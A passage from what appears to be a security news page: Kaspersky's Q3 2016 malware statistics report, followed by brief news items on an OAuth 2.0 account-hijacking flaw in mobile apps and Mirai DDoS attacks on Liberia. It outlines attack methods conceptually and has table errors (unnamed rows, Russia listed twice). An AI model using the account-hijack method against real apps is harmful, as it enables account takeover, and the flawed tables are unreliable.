In the third quarter, we registered the propagation of Trojan-Ransom.AndroidOS.Pletor.d, a mobile ransomware program, via Google Play. The Trojan imitated an app for servicing devices, including deleting unnecessary data, speeding up device performance and even antivirus protection.


Trojan-Ransom.AndroidOS.Pletor.d in Google Play

The Trojan checks which country the device is located in, and if it is not Russia or Ukraine, it requests administrator rights and calls the command server. Earlier versions of this Trojan encrypted user data, but this modification doesn’t possess such functionality. Instead, the Trojan blocks operation of the device by opening a window that covers all other open windows and demanding a ransom to unblock it.

Mobile threat statistics

In Q3 2016, Kaspersky Lab detected 1,520,931 malicious installation packages, which is 2.3 times fewer than in the previous quarter.


Number of detected malicious installation packages (Q4 2015 – Q1 2016)

Distribution of mobile malware by type


Distribution of new mobile malware by type (Q2 2016 and Q3 2016)

In Q3 2016, RiskTool software, or legitimate applications that are potentially dangerous to users, topped the rating of malicious objects detected for mobile devices. Their share continued to grow from 45.1% in Q2 to 55.8% this quarter.

Due to the large number of RiskTool programs and the considerable increase in their overall share of the total flow of detected objects, the proportion of almost all other types of malicious programs decreased, even where the actual number of detected programs increased compared to the previous quarter.

The most affected was Trojan-Ransom – its share decreased from 5.72% to 2.37%. This was caused by a decline in activity by the Trojan-Ransom.AndroidOS.Fusob family (covered in more detail below).

At the same time, we registered a slight growth in the share of Trojan-Bankers – from 1.88% to 1.98%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users*
1 DangerousObject.Multi.Generic 78,46
2 Trojan-Banker.AndroidOS.Svpeng.q 11,45
3 Trojan.AndroidOS.Ztorg.t 8,03
4 Backdoor.AndroidOS.Ztorg.c 7,24
5 Backdoor.AndroidOS.Ztorg.a 6,55
6 4,91
7 Trojan.AndroidOS.Hiddad.v 4,55
8 4,25
9 3,67
10 Trojan.AndroidOS.Ztorg.aa 3,61
11 Trojan-Banker.AndroidOS.Svpeng.r 3,44
12 Trojan.AndroidOS.Ztorg.pac 3,31
13 Trojan.AndroidOS.Iop.c 3,27
14 Trojan.AndroidOS.Muetan.b 3,17
15 Trojan.AndroidOS.Vdloader.a 3,14
16 Trojan-Dropper.AndroidOS.Triada.s 2,80
17 Trojan.AndroidOS.Muetan.a 2,77
18 Trojan.AndroidOS.Triada.pac 2,75
19 Trojan-Dropper.AndroidOS.Triada.d 2,73
20 Trojan.AndroidOS.Agent.eb 2,63
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place is occupied by DangerousObject.Multi.Generic (78.46%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

In Q3 2016, 17 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them.

In Q3 2016, attempted infections by financial #malware were registered at 1.2m users’ computers #KLreport #banking

With root access on the device, Trojans can do many different things without the user being aware, such as installing apps from Google Play, including paid apps.

It’s worth noting that the Trojans from the Ztorg family, which occupied four places in the TOP 20, are often distributed via the official Google Play store. Since the end of 2015, we have registered more than 10 such cases (including a fake guide for Pokemon GO). Several times the Trojan notched up over 100,000 installations, and on one occasion it was installed more than 500,000 times. masquerading as a guide for Pokemon GO in Google Play

The ranking also included two representatives of the Trojan-Banker.AndroidOS.Svpeng mobile banker family. As we mentioned above, Svpeng.q became the most popular malware in the third quarter of 2016. This was down to the Trojan being distributed via the AdSense advertising network, which is used by a large number of sites on the Russian segment of the Internet.

The geography of mobile threats


The geography of attempted mobile malware infections in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 Bangladesh 35,57
2 Nepal 31.54
3 Iran 31.38
4 China 26.95
5 Pakistan 26.83
6 Indonesia 26.33
7 India 24,35
8 Nigeria 22.88
9 Algeria 21,82
10 The Philippines 21.67
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

Bangladesh topped the rating, with almost 36% of users there encountering a mobile threat at least once during the quarter. China, which came first in this rating two quarters in a row, dropped to fourth place.

The most popular mobile malware in all the countries of this rating (except China) was the same – advertising Trojans that mostly belonged to the Ztorg, Iop, Hiddad and Triada families. A significant proportion of attacks in China also involved advertising Trojans, but the majority of users there encountered Trojans from the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families.

Russia (12.1%) came 24th in this rating, France (6.7%) 52nd, the US (5.3%) 63rd, Italy (5.1%) 65th, Germany (4.9%) 68th, and the United Kingdom (4.7%) 71st.

The situation in Germany and Italy has improved significantly: in the previous quarter, 8.5% and 6.2% of users in those countries respectively were attacked. This was due to a decline in activity by the Fusob family of mobile ransomware.

The safest countries were Austria (3.3%), Croatia (3.1%) and Japan (1.7%).

Mobile banking Trojans

Over the reporting period, we detected 30,167 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q2.


Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions
(Q4 2015 – Q3 2016)

Trojan-Banker.AndroidOS.Svpeng became the most popular mobile banking Trojan in Q3 due to its active distribution via the advertising network AdSense. More than half the users that encountered mobile banking Trojans in the third quarter faced Trojan-Banker.AndroidOS.Svpeng.q. It was constantly increasing the rate at which it spread – in September the number of users attacked by the Trojan was almost eight times greater than in June.


The number of unique users attacked by the Trojan-Banker.AndroidOS.Svpeng banking Trojan family
(June-September 2016)

Over 97% of attacked users were in Russia. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking.


Geography of mobile banking threats in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked**
1 Russia 3.12
2 Australia 1.42
3 Ukraine 0.95
4 Uzbekistan 0.60
5 Tajikistan 0.56
6 Kazakhstan 0.51
7 China 0.49
8 Latvia 0.47
9 Russia 0.41
10 Belarus 0.37
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q3 2016, first place was occupied by Russia (3.12%) where the proportion of users that encountered mobile banker Trojans almost doubled from the previous quarter.

In second place again was Australia (1.42%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats.

The most widely distributed mobile banking Trojans in Q3 were representatives of the Svpeng, Faketoken, Regon, Asacub, Gugi and Grapereh families. In particular, the third quarter saw the Trojan-Banker.AndroidOS.Gugi family learn how to bypass protection mechanisms in Android by tricking users.

Mobile Ransomware

In Q3 2016, we detected 37,150 mobile Trojan-Ransomware installation packages.


Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q4 2015 – Q3 2016)

The sharp rise in the number of mobile Trojan-Ransomware installation packages in Q1 and Q2 of 2016 was caused by the active proliferation of the Trojan-Ransom.AndroidOS.Fusob family of Trojans. In the first quarter of 2016, this family accounted for 96% of users attacked by mobile ransomware; in Q2 it accounted for 85%. Its share in Q3 was 73%.


Number of users attacked by the Trojan-Ransom.AndroidOS.Fusob family, January-September 2016

The highest number of users attacked by the mobile Trojan-Ransomware family was registered in March 2016. Since then the amount of attacked users has been decreasing, especially in Germany.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the third quarter, accounting for nearly 53% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.


Geography of mobile Trojan-Ransomware in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked **
1 Canada 0.95
2 USA 0.94
3 Kazakhstan 0.71
4 Germany 0.63
5 UK 0.61
6 Mexico 0.58
7 Australia 0.57
8 Spain 0,54
9 Italy 0.53
10 Switzerland 0.51
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

In all the TOP 10 countries apart from Kazakhstan, the most popular Trojan-Ransom family was Fusob. In the US, the Trojan-Ransom.AndroidOS.Svpeng family was also popular. This Trojan family emerged in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng family. These Trojans demand a ransom of $100-$500 from victims to unblock their devices.

In Q3 2016, #crypto #ransomware attacks were blocked on 821,865 unique computers #KLreport

In Kazakhstan, the main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks the operation of a device by overlaying all the windows with its own and demanding $10 to remove it.

Vulnerable apps exploited by cybercriminals

In Q3 2016, the Neutrino exploit kit departed the cybercriminal market, following in the wake of Angler and Nuclear which also left the market in the previous quarter.

RIG and Magnitude remain active. RIG was especially prominent – it has quickly filled the vacant niche on the exploit kit market.

This is the overall picture for the use of exploits this quarter:


Distribution of exploits used in attacks by the type of application attacked, Q3 2016

Exploits for different browsers and their components (45%) once again topped the rating, although their share decreased by 3 percentage points. They are followed by exploits for Android OS vulnerabilities (19%), whose share fell 5 p.p. in the third quarter. Exploits kits for Microsoft Office rounded off the top three. Their contribution actually saw an increase from 14% to 16% in Q3.

Exploits for Adobe Flash Player remained popular. In fact, their share more than doubled from 6% to 13%. This was caused by the aforementioned RIG exploit kit: its use in several campaigns saw the share of SWF exploits increase dramatically.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

In the third quarter of 2016, Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects (scripts, exploits, executable files, etc.) and 45,169,524 unique URLs were recognized as malicious by web antivirus components. Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.

Online threats in the banking sector

These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.

Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 1,198,264 computers in Q3 2016. The number of users attacked by financial malware increased by 5.8% from the previous quarter (1,132,031).

The third quarter is traditionally holiday season for many users of online banking services in Europe, which means the number of online payments made by these users increases during this period. This inevitably sees an increase in financial risks.


Number of users attacked by financial malware, Q3 2016

In Q3, the activity of financial threats grew month on month.

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.


Geography of banking malware attacks in Q3 2016 (percentage of attacked users)

TOP 10 countries by percentage of attacked users

Country* % of attacked users**
1 Russia 4.20
2 Sri Lanka 3.48
3 Brazil 2.86
4 Turkey 2.77
5 Cambodia 2.59
6 Ukraine 1.90
7 Venezuela 1.90
8 Vietnam 1.86
9 Argentina 1.86
10 Uzbekistan 1.77
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In the third quarter of 2016, Russia had the highest proportion of users attacked by banking Trojans. Representatives of the Trojan-Banker ZeuS (Zbot) family, which leads the way in terms of the number of attacked users worldwide, were especially active in Russia. This is unsurprising since Russian cybercriminals are allegedly behind the development of this malware. They know the specifics of Russia’s online banking systems as well as the mentality of Russian users and take them into consideration when developing their malware. In Russia, the Gozi banking Trojan continues to proliferate. It displayed a burst of activity in the previous quarter after its developers joined forces with the creators of the Nymaim Trojan. Russia also topped the TOP 10 countries with the highest proportion of users attacked by mobile bankers.

Sri Lanka, a favorite destination with tourists, was a newcomer to the rating, going straight in at second. Financial threats were encountered by 3.48% of users in the country. Among them are likely to be foreigners who arrived in the country on holiday and used online banking services to make payments. The most active representatives of banking malware in the region were those from the Fsysna banker family. This family has previously been noted for attacks targeting customers of Latin American banks.

In Q3 2016, @kaspersky #mobile security products detected 1.5m malicious installation packages #KLreport

Brazil rounds off the top three for the second quarter in a row. In Q2, we forecast a surge of financial threat activity in Latin America and specifically in Brazil because of this summer’s Olympic Games. However, the increase in the proportion of users attacked in Brazil was negligible: in the third quarter, 2.86% of users in Brazil encountered financial threats compared to 2.63% in Q2. At the same time, users in Argentina were subjected to a surge in malicious attacks, and as a result, the country ranked ninth.

The holiday season affected almost all countries in the TOP 10. In Russia, Ukraine and Uzbekistan, people traditionally have vacations at this time of the year, while other countries (Sri Lanka, Brazil, Turkey, Cambodia, etc.) are considered popular tourist destinations. Tourists tend to be active users of online banking systems, which in turn attracts cybercriminals and their banking malware.

The share of banking Trojan victims in Italy was 0.60%, in Spain it was 0.61%, while in Germany and the UAE the figures were 1.21% and 1.14% respectively.

The TOP 10 banking malware families

The table below shows the TOP 10 malware families used in Q3 2016 to attack online banking users (as a percentage of users attacked):

Name* % of attacked users**
1 Trojan-Spy.Win32.Zbot 34.58
2 Trojan.Win32.Qhost/Trojan.BAT.Qhost 9.48
3 Trojan.Win32.Fsysna 9.467
4 Trojan-Banker.Win32.Gozi 8.98
5 Trojan.Win32.Nymaim 8.32
6 Trojan-Banker.Win32.Shiotob 5.29
7 Trojan-Banker.Win32.ChePro 3.77
8 Trojan-Banker.Win32.BestaFera 3.31
9 Trojan-Banker.Win32.Banbra 2.79
10 Trojan.Win32.Neurevt 1.79
* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

The undisputed leader of the rating is Trojan-Spy.Win32.Zbot. Its source codes have been publicly available since a leak and are now widely exploited as an easy-to-use tool for stealing user payment data. Unsurprisingly, this malware consistently tops this rating – cybercriminals regularly enhance the family with new modifications compiled on the basis of the source code and containing minor differences from the original.

The family of Qhost Trojans (verdicts Trojan.Win32.Qhost and Trojan.BAT.Qhost) came second. The functionality of this family’s malicious programs is relatively simple: the Trojan modifies the content of the Host file (a special text file that contains a database of domain names that are used when transmitting to the network addresses of nodes) and as soon as specific resources are visited, the Trojan’s malicious components are loaded to an infected workstation and used to steal payment information. The Trojan adds a number of records to the Host file preventing the user’s browser from connecting to web-based apps and resources of popular antivirus vendors.

The Q3 rating also includes a new malware representative that has already demonstrated its capabilities in Sri Lanka – the Trojan.Win32.Fsysna family of banking Trojans. Members of this family, in addition to stealing payment data from infected workstations, are also used by cybercriminals to distribute spam. The Trojan uses an infected machine to redirect spam messages from the command center to a mail server. Some representatives of this family also possess Trojan cryptor functionality. Fsysna is kind of a ‘Swiss army knife’ used by cybercriminals to steal money.

Q3 2016 saw a decline in the activity of the notorious financial threat Trojan-Spy.Win32.Lurk: the number of users attacked by this malware fell by 7.1%. Lurk was not included in the TOP 10 banking malware families, but it still poses a threat to users of online banking systems. The cybercriminal group behind this financial threat has been arrested (something we wrote about in a separate article), so we expect to see a further decrease in activity by this banking Trojan next quarter.

Ransomware Trojans

Cryptors are currently one of the biggest threats to users and companies. These malicious programs are becoming more and more popular in the cybercriminal world because they are capable of generating large profits for their owners.

A total of 21 new cryptor families and 32,091 new modifications were detected in Q3. We also added several existing cryptor families to our virus collection.

The number of new cryptor families added to our virus collection is slightly less than in the second quarter (25), but the number of newly created modifications increased 3.5 times compared to the previous quarter.


The number of newly created cryptor modifications, Q1 – Q3 2016

Malware writers are constantly trying to improve their creations. New ways to infect computers are always being sought, especially for attacks on companies, which cybercriminals see as far more profitable than attacks on standard users.

Remote launching of cryptors by cybercriminals

We are increasingly seeing incidents where cybercriminals crack passwords to gain remote access to a victim’s system (usually an organization) and infect a compromised machine with Trojan ransomware. Examples of this in Q3 were Dcryptor and Xpan.


Trojan-Ransom.Win32.Dcryptor is known on the Internet under the pseudonym ‘Mamba’. Infection is carried out manually. The fraudsters brute-force the passwords for remote access to the victim machine and run the Trojan, passing on the password for encryption as a command line argument.

During infection, the Trojan uses the legitimate DiskCryptor utility. As a result, it’s not just individual files on network drives that are infected but entire hard drive sectors on the local machine. System boot is blocked: once the computer is started, a message appears on the screen demanding a ransom and displaying an email address for communicating with the attackers.

This Trojan reminds us of the notorious Petya/Mischa Trojan and continues the growing trend of cybercriminals looking for new ways to block access to data.

Xpan/TeamXRat ransomware

Trojan-Ransom.Win32.Xpan is yet another example of ransomware that is launched after attackers remotely penetrate a system. This Trojan is distributed by Brazilian cybercriminals. They brute-force the RDP password (the standard protocol for remote access to Windows computers) and infect the compromised system using the Xpan Trojan that encrypts files and displays a ransom demand.

Ransomware in scripting languages

Another trend that has attracted our attention is the growing number of cryptors written in scripting languages. In the third quarter of 2016, we came across several new families written in Python:

HolyCrypt (Trojan-Ransom.Python.Holy)
CryPy (Trojan-Ransom.Python.Kpyna)
Another example that emerged in June was Stampado (Trojan-Ransom.Win32.Stampa) written in AutoIt, the automation language.

The number of users attacked by ransomware

In Q3 2016, 821,865 unique KSN users were attacked by cryptors – that is 2.6 times more than the previous quarter.


Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2016)

The largest contribution was made by representatives of the Trojan-Downloader.JS.Cryptoload family. These Trojan downloaders, written in JavaScript, were designed to download and install representatives of different cryptor families in the system.


Geography of Trojan-Ransomattacks in Q3 2016 (percentage of attacked users)

Top 10 countries attacked by cryptors

Country* % of users attacked by cryptors**
1 Japan 4.83
2 Croatia 3.71
3 Korea 3.36
4 Tunisia 3.22
5 Bulgaria 3.20
6 Hong Kong 3.14
7 Taiwan 3.03
8 Argentina 2.65
9 Maldives 2.63
10 Australia 2.56
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

As in the previous quarter, Japan topped this rating.

Newcomers to this Top 10 were Tunisia, Hong Kong, Argentina, and Australia, with Italy, Djibouti, Luxembourg, and the Netherlands all making way.

Top 10 most widespread cryptor families

Name Verdict* % of attacked users**
1 CTB-Locker Trojan-Ransom.Win32.Onion/ Trojan-Ransom.NSIS.Onion 28.34
2 Locky Trojan-Ransom.Win32.Locky 9.60
3 CryptXXX Trojan-Ransom.Win32.CryptXXX 8.95
4 TeslaCrypt Trojan-Ransom.Win32.Bitman 1.44
5 Shade Trojan-Ransom.Win32.Shade 1.10
6 Cryakl Trojan-Ransom.Win32.Cryakl 0.82
7 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 0.73
8 Cerber Trojan-Ransom.Win32.Zerber 0.59
9 CryptoWall Trojan-Ransom.Win32.Cryptodef 0.58
10 Crysis Trojan-Ransom.Win32.Crusis 0.51
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

CTB-Locker once again occupied first place in the Q3. The top three also included the now infamous Locky and CryptXXX. Despite the fact that the owners of TeslaCrypt disabled their servers and posted a master key to decrypt files back in May 2016, it continues to make it into our rating (although its contribution dropped by 5.8 times in Q3)


Crysis (verdict Trojan-Ransom.Win32.Crusis) was a newcomer to the TOP 10 in Q3. This Trojan was first detected in February 2016 and since then has undergone several code modifications.

Interestingly, the list of email addresses used for ransom demands by the distributors of Crysis partly matches the list associated with the Cryakl and Aura Trojans. Analysis of the executable files from these families, however, shows that they do not share the same code. It appears that these malicious programs are spread via a partner scheme, and because some distributors are distributing several different Trojans simultaneously they are using the same email address to communicate their ransom demands to the victims.


This Trojan appeared in August 2016 (we recently published a detailed analysis of Polyglot/ MarsJoke). It is not included in the TOP 10, but it does have one interesting feature: the authors have tried to imitate the well-known CTB-Locker, which tops the rating for the second quarter in a row. Both the external and internal design of this piece of malware is very similar to the “original”, but the cybercriminals made a mistake that allows files to be decrypted without paying a ransom.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q3 2016, Kaspersky Lab solutions blocked 171,802,109 attacks launched from web resources located in 190 countries around the world. 45,169,524 unique URLs were recognized as malicious by web antivirus components.

83% of notifications about blocked web attacks were triggered by attacks coming from web resources located in 10 countries.


Distribution of web attack sources by country, Q3 2016

The US (33.51%) remained top of this rating in Q3. Russia (9%) dropped from second to fourth, while Germany came second with a share of 10.5%. Canada left the Top 10, with Cyprus a newcomer in ninth place (1.24%).

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

In Q3 2016, 30,167 #mobile #banking Trojans were detected by @kaspersky mobile security products #KLreport

Please note that starting this quarter, this rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked **
1 Slovenia 30.02
2 Bulgaria 29.49
3 Armenia 29.30
4 Italy 29.21
5 Ukraine 28.18
6 Spain 28.15
7 Brazil 27.83
8 Belarus 27.06
9 Algeria 26.95
10 Qatar 26.42
11 Greece 26.10
12 Portugal 26.08
13 Russia 25.87
14 France 25.44
15 Kazakhstan 25.26
16 Azerbaijan 25.05
17 United Arab Emirates 24.97
18 Vietnam 24.73
19 China 24.19
20 Albania 23.23
These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 20.2% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.


Geography of malicious web attacks in Q3 2016 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Croatia (14.21%), the UK (14.19%), Singapore (13.78%), the US (13.45%), Norway (13.07%), Czech Republic (12.80%), South Africa (11.98%), Sweden (10.96%), Korea (10.61%), the Netherlands (9.95%), Japan (9.78%).

Local threats

Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2016, Kaspersky Lab’s file antivirus detected 116,469,744 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

In Q3 2016, @kaspersky #mobile security products detected 37,150 mobile #ransomware Trojans #KLreport

Please note that starting this quarter, the rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Vietnam 52.07
2 Afghanistan 52.00
3 Yemen 51.32
4 Somalia 50.78
5 Ethiopia 50.50
6 Uzbekistan 50.15
7 Rwanda 50,14
8 Laos 49.27
9 Venezuela 49.27
10 Philippines 47.69
11 Nepal 47.01
12 Djibouti 46.49
13 Burundi 46,17
14 Syria 45.97
15 Bangladesh 45.48
16 Cambodia 44.51
17 Indonesia 43.31
18 Tajikistan 43,01
19 Mozambique 42.98
20 Myanmar 42.85
These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

An average of 22.9% of computers globally faced at least one Malware-class local threat during the third quarter.


The safest countries in terms of local infection risks were: Spain (14.68%), Singapore (13.86%), Italy (13.30%), Finland (10.94%), Norway (10.86%), France (10.81%), Australia ( 10.77%), Czech Republic (9.89%), Croatia (9.70%), Ireland (9.62%), Germany (9.16%), the UK (9.09%), Canada (8.92%), Sweden (8.32%), the USA (8.08%), Denmark (6.53%), and Japan (6.53%).

One oAuth 2.0 hack, 1 Billion Android App Accounts potentially exposed
5.11.2016 securityaffairs Android

Security researchers demonstrated that a Wrong oAuth 2.0 implementation allows a remote simple hack that exposes more than 1 Billion Android App Accounts.
A remote simple hack devised by a group of security researchers threatens an amazing number of Android and iOS apps. An attacker can use the technique to sign into any victim’s mobile app account without any knowledge of the legitimate user.

The research team from the Chinese University of Hong Kong is composed of Ronghai Yang, Wing Cheong Lau, and Tianyu Liu. The experts discovered that the vast majority of popular mobile apps that use the single sign-on (SSO) service doesn’t properly implement the OAuth 2.0 protocol.

The OAuth 2.0 authentication protocol is widely used on social networking sites, every day billion of users access their profiles on Facebook and Google+ using it.

Using the OAuth 2.0, users can sign in for third-party services by verifying existing identity through their accounts on popular web services such as Google, Facebook, or Sina.

Once authenticated, the users haven’t to provide their credentials to access other services implementing the OAuth 2.0 protocol.

This process enables users to sign-in to any service without providing additional usernames or passwords. This magic is possible because when a user logs into a third party app via OAuth, the app checks with the ID provider (i.e. Facebook, Google).
The ID providers, in turn, provide the Access Token to the server of that mobile app that uses it to request the user’s authentication information from the ID provider (i.e. Facebook). In this way, it is able to check user’s identity with data provided by the ID provider and authorize the login.
Below an image from the slides presented by the Team at the Black Hat Europe.
oAuth 2.0 process
The Chinese researchers discovered that a large number of Android apps did not properly check the validity of the information passed by the ID provider.
The experts explained that the server app instead of verifying the OAuth information included in the Access Token to authenticate the user, the app server would only check if the information is passed by a legitimate ID provider.
This implementation opens the doors to the attackers that can install the flawed app on their mobile devices, log in to their own account and then simply by changing their username to the victim’s one by setting up a server to modify the data sent from Facebook, Google or other ID providers.
oAuth 2.0 attack
With this technique, the attacker can access data used by the flawed app potentially exposing sensitive information or use the app acting on behalf of the victims.
“The problem is a pretty basic mistake,” Lau told Forbes.

“The impact, he said, could be severe. For instance, if the hacker broke into a travel app, they could learn the full itinerary of an individual. For a hotel booking app, they could book a room and have the victim pay for it. Or they could simply steal personal data, like addresses or bank details.” wrote Thomas Fox-Brewster from Forbes.

“A lot of third party developers are ma and pa shops, they don’t have the capability. Most of the time they’re using Google and Facebook recommendations, but if they don’t do it correctly, their apps will be wide open.” .

The experts have found hundreds of popular US and Chinese Android apps that support SSO service. The number of downloads is huge, the researchers explained that a total of over 2.4 Billion downloads are vulnerable to this attack.

The experts estimated that over a Billion different mobile app accounts are at risk of being hijacked with their attack.

oAuth 2.0 attack-3

The researchers did not perform any test on iOS devices, but they believed that the attack would work also on Apple apps

“Although our current attack is demonstrated over the Android platform, the exploit itself is platform-agnostic: any iOS or Android user of the vulnerable mobile app is affected as long as he/ she has used the OAuth2.0-based SSO service with the app before,” the researchers said.

Someone is Using Mirai Botnet to Shut Down Internet for an Entire Country
4.11.2016 thehackernews BotNet
Someone is trying to take down the whole Internet of a country by launching massive distributed denial-of-service (DDoS) attacks using a botnet of insecure IoT devices infected by the Mirai malware.
It all started early October when a cybercriminal publically released the source code of Mirai – a piece of nasty IoT malware designed to scan for insecure IoT devices and enslaves them into a botnet network, which is then used to launch DDoS attacks.
Just two weeks ago, the Mirai IoT Botnet caused vast internet outage by launching massive DDoS attacks against DNS provider Dyn, and later it turns out that just 100,000 infected-IoT devices participated in the attacks.
Experts believe that the future DDoS attack could reach 10 Tbps, which is enough to take down the whole Internet in any nation state.
One such incident is happening from past one week where hackers are trying to take down the entire Internet of Liberia, a small African country, using another Mirai IoT botnet known as Botnet 14.
Mirai botnet
Security researcher Kevin Beaumont has noticed that Botnet 14 has begun launching DDoS attacks against the networks of "Lonestar Cell MTN ", the telecommunication company which provides the Internet to entire Liberia via a single entry point from undersea fiber cable.
"From monitoring, we can see websites hosted in country going offline during the attacks — Additionally, a source in country at a Telco has confirmed to a journalist they are seeing intermittent internet connectivity, at times which directly match the attack," Beaumont said in a blog post published today.
According to Beaumont, transit providers confirm that the attacks were over 500 Gbps in size, but last for a short period. This volume of traffic indicates that the "Shadows Kill" Botnet, as the researcher called it, is "owned by the actor which attacked Dyn."
Why Taking Down Liberia's Internet Is easy?
Over a decade of civil war in Liberia destroyed the country's telecommunications infrastructure, and at that time a very small portion of citizens in Liberia had access to the internet via satellite communication.
However, some progress were made later in 2011 when a 17,000 km Africa Coast to Europe (ACE) submarine fiber-optic cable was deployed from France to Cape Town, via the west coast of Africa.
The ACE fiber cable, at depths close to 6,000 meters below sea level, eventually provides broadband connectivity to more 23 countries in Europe and Africa.
What's shocking? The total capacity of this cable is just 5.12 Tbps, which is shared between all of the 23 countries.
Since massive DDoS attack against DynDNS used a Mirai botnet of just 100,000 hacked IoT devices to close down the Internet for millions of users, one can imagine the capability of more than 1 Million hacked IoT devices, which is currently in control of the Mirai malware and enough to severely impact systems in any nation state.
This is extremely worrying because, with this capacity, not just Liberia, an attacker could disrupt the Internet services in all 23 countries in Europe and Africa, which relies on the ACE fiber cable for their internet connectivity.
The root cause? More insecure, vulnerable IoT devices, more Mirai bots.
So, in order to protect yourself, you need to be more vigilant about the security of your smart devices because they are dumber than one can ever be.
